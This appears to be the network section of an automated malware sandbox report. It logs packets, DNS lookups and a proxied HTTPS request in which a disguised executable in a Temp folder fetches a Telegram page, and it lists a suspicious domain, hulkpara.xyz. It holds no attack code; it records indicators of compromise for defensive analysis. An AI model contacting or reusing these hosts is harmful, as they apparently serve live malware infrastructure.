Dec 18, 2024 21:10:04.798444033 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.114705086 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.120533943 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.120551109 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.120570898 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.120891094 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.129548073 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.443964958 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.449891090 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.449933052 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.450006008 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.450237989 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.457799911 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.772552013 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.778254986 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.778290033 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.778394938 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:05.778603077 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:05.796614885 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.117175102 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.123733997 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.123769045 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.123825073 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.124047041 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.131027937 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.446001053 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.452142000 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.452193022 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.452213049 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.452621937 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.459640026 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.777620077 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.790273905 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.790292978 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.790378094 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:06.790853024 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:06.797389030 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.138490915 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.155333996 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.155366898 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.155396938 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.155659914 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.162784100 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.477586031 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.483577967 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.483632088 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.483817101 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.484117985 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.491791010 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.813476086 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.820389986 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.820446968 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.820494890 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:07.820743084 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:07.827527046 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:08.142026901 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.148263931 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.148350000 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.148474932 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.148561954 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:08.155330896 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:08.527285099 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.564234018 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:08.696885109 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.696909904 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.696947098 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:08.697400093 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:08.703778982 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.018919945 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.023924112 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.023942947 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.024090052 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.024302959 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.032136917 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.347417116 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.354124069 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.354157925 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.354211092 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.354409933 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.364347935 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.683619022 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.694755077 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.694834948 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.694879055 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:09.695100069 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:09.705173016 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.036226034 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.036289930 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.036320925 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.036353111 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.036381006 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.036648035 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.059163094 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.375397921 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.391931057 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.391966105 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.392030954 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.392266035 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.401938915 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.718406916 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.724531889 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.724565029 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.724597931 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:10.724883080 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:10.732240915 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.066852093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.080552101 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.080595016 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.080647945 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.080933094 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.087814093 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.402364016 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.408567905 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.408658981 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.408778906 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.409895897 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.416136980 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.731865883 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.736596107 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.736627102 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.736732960 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:11.737690926 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:11.753324032 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.078917980 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.103053093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.103084087 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.103120089 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.103457928 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.111335993 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.429657936 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.436134100 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.436182022 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.436296940 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.436450005 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.442140102 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.765635967 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.781883001 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.781897068 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.782032967 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:12.782226086 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:12.788021088 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.106340885 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.116085052 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.116255999 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.116288900 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.116547108 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.122792006 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.441920996 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.446446896 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.446484089 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.446536064 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.449757099 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.461674929 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.776973009 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.782471895 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.782676935 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.782819033 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:13.783338070 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:13.789530993 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:14.106678009 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.114388943 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.114428043 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.114541054 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.114813089 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:14.128072023 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:10:14.442689896 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.450628042 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.450639963 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.450649977 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:10:14.930224895 CET	443	62192	23.44.203.15	192.168.2.9

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 18, 2024 21:09:25.186242104 CET	192.168.2.9	1.1.1.1	c2bc	(Port unreachable)	Destination Unreachable
Dec 18, 2024 21:09:27.746462107 CET	192.168.2.9	1.1.1.1	c24f	(Port unreachable)	Destination Unreachable
Dec 18, 2024 21:09:29.994410992 CET	192.168.2.9	1.1.1.1	c26d	(Port unreachable)	Destination Unreachable
Dec 18, 2024 21:09:31.210573912 CET	192.168.2.9	1.1.1.1	c2a0	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 21:08:11.086010933 CET	192.168.2.9	1.1.1.1	0xa986	Standard query (0)	oNDvJHpUYYRpVDcYWEDspYa.oNDvJHpUYYRpVDcYWEDspYa	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:08:40.035507917 CET	192.168.2.9	1.1.1.1	0x512c	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:08:42.194142103 CET	192.168.2.9	1.1.1.1	0xd976	Standard query (0)	hulkpara.xyz	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:00.877876043 CET	192.168.2.9	1.1.1.1	0xd02a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:00.878009081 CET	192.168.2.9	1.1.1.1	0x2146	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:24.620562077 CET	192.168.2.9	1.1.1.1	0x3f9a	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:24.620691061 CET	192.168.2.9	1.1.1.1	0x5581	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:27.149636984 CET	192.168.2.9	1.1.1.1	0xb3d2	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:27.149946928 CET	192.168.2.9	1.1.1.1	0x406e	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 18, 2024 21:09:27.516293049 CET	192.168.2.9	1.1.1.1	0x807	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:27.516642094 CET	192.168.2.9	1.1.1.1	0x9126	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.112540007 CET	192.168.2.9	1.1.1.1	0xe2ca	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.112701893 CET	192.168.2.9	1.1.1.1	0xeb27	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.113120079 CET	192.168.2.9	1.1.1.1	0x48fa	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.113295078 CET	192.168.2.9	1.1.1.1	0x8f3c	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.123300076 CET	192.168.2.9	1.1.1.1	0xb510	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.123604059 CET	192.168.2.9	1.1.1.1	0x5a42	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.840636969 CET	192.168.2.9	1.1.1.1	0x801	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.840783119 CET	192.168.2.9	1.1.1.1	0x4298	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.856262922 CET	192.168.2.9	1.1.1.1	0x6ed9	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.856477022 CET	192.168.2.9	1.1.1.1	0x54d3	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.921120882 CET	192.168.2.9	1.1.1.1	0xe990	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.921457052 CET	192.168.2.9	1.1.1.1	0xdd9b	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:29.985615015 CET	192.168.2.9	1.1.1.1	0xd106	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.986011028 CET	192.168.2.9	1.1.1.1	0x6947	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 18, 2024 21:09:30.120973110 CET	192.168.2.9	1.1.1.1	0x224	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:30.121129036 CET	192.168.2.9	1.1.1.1	0x5921	Standard query (0)	api.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 21:08:11.317584038 CET	1.1.1.1	192.168.2.9	0xa986	Name error (3)	oNDvJHpUYYRpVDcYWEDspYa.oNDvJHpUYYRpVDcYWEDspYa	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:08:40.172312021 CET	1.1.1.1	192.168.2.9	0x512c	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:08:42.512206078 CET	1.1.1.1	192.168.2.9	0xd976	No error (0)	hulkpara.xyz		94.130.191.168	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:01.014942884 CET	1.1.1.1	192.168.2.9	0xd02a	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:01.015243053 CET	1.1.1.1	192.168.2.9	0x2146	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 18, 2024 21:09:24.757915020 CET	1.1.1.1	192.168.2.9	0x3f9a	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:24.758337021 CET	1.1.1.1	192.168.2.9	0x5581	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:25.087208033 CET	1.1.1.1	192.168.2.9	0x2892	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:25.087208033 CET	1.1.1.1	192.168.2.9	0x2892	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:25.185976982 CET	1.1.1.1	192.168.2.9	0x8e24	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:27.287070990 CET	1.1.1.1	192.168.2.9	0x406e	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:27.290278912 CET	1.1.1.1	192.168.2.9	0xb3d2	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:27.655468941 CET	1.1.1.1	192.168.2.9	0x807	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:27.655468941 CET	1.1.1.1	192.168.2.9	0x807	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:27.746397018 CET	1.1.1.1	192.168.2.9	0x9126	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:29.249686003 CET	1.1.1.1	192.168.2.9	0xe2ca	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.249686003 CET	1.1.1.1	192.168.2.9	0xe2ca	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.249703884 CET	1.1.1.1	192.168.2.9	0x48fa	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.249703884 CET	1.1.1.1	192.168.2.9	0x48fa	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.250144958 CET	1.1.1.1	192.168.2.9	0xeb27	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 18, 2024 21:09:29.250180960 CET	1.1.1.1	192.168.2.9	0x8f3c	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 18, 2024 21:09:29.261018991 CET	1.1.1.1	192.168.2.9	0x5a42	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 18, 2024 21:09:29.261030912 CET	1.1.1.1	192.168.2.9	0xb510	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.261030912 CET	1.1.1.1	192.168.2.9	0xb510	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.977490902 CET	1.1.1.1	192.168.2.9	0x801	No error (0)	sb.scorecardresearch.com		18.165.220.57	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.977490902 CET	1.1.1.1	192.168.2.9	0x801	No error (0)	sb.scorecardresearch.com		18.165.220.106	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.977490902 CET	1.1.1.1	192.168.2.9	0x801	No error (0)	sb.scorecardresearch.com		18.165.220.66	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.977490902 CET	1.1.1.1	192.168.2.9	0x801	No error (0)	sb.scorecardresearch.com		18.165.220.110	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:29.994348049 CET	1.1.1.1	192.168.2.9	0x54d3	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:29.995883942 CET	1.1.1.1	192.168.2.9	0x6ed9	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.059711933 CET	1.1.1.1	192.168.2.9	0xdd9b	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.060193062 CET	1.1.1.1	192.168.2.9	0xe990	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.123089075 CET	1.1.1.1	192.168.2.9	0xd106	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.123713017 CET	1.1.1.1	192.168.2.9	0x6947	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.258331060 CET	1.1.1.1	192.168.2.9	0x224	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 21:09:30.260081053 CET	1.1.1.1	192.168.2.9	0x5921	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

hulkpara.xyz

www.google.com

clients2.googleusercontent.com

chrome.cloudflare-dns.com

https:

sb.scorecardresearch.com

browser.events.data.msn.com

c.msn.com

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After
Dec 18, 2024 21:08:00.824811935 CET	13.107.246.63	443	192.168.2.9	49707	CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Sun Dec 15 06:45:59 CET 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013	Fri Jun 13 07:45:59 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038
					CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jun 08 02:00:00 CEST 2023	Wed Aug 26 01:59:59 CEST 2026
					CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 01 14:00:00 CEST 2013	Fri Jan 15 13:00:00 CET 2038

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49709	149.154.167.99	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:41 UTC	85	OUT	GET /k04ael HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:42 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 20:08:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12301 Connection: close Set-Cookie: stel_ssid=d0b6eafa2612260665_9842183185938215856; expires=Thu, 19 Dec 2024 20:08:41 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
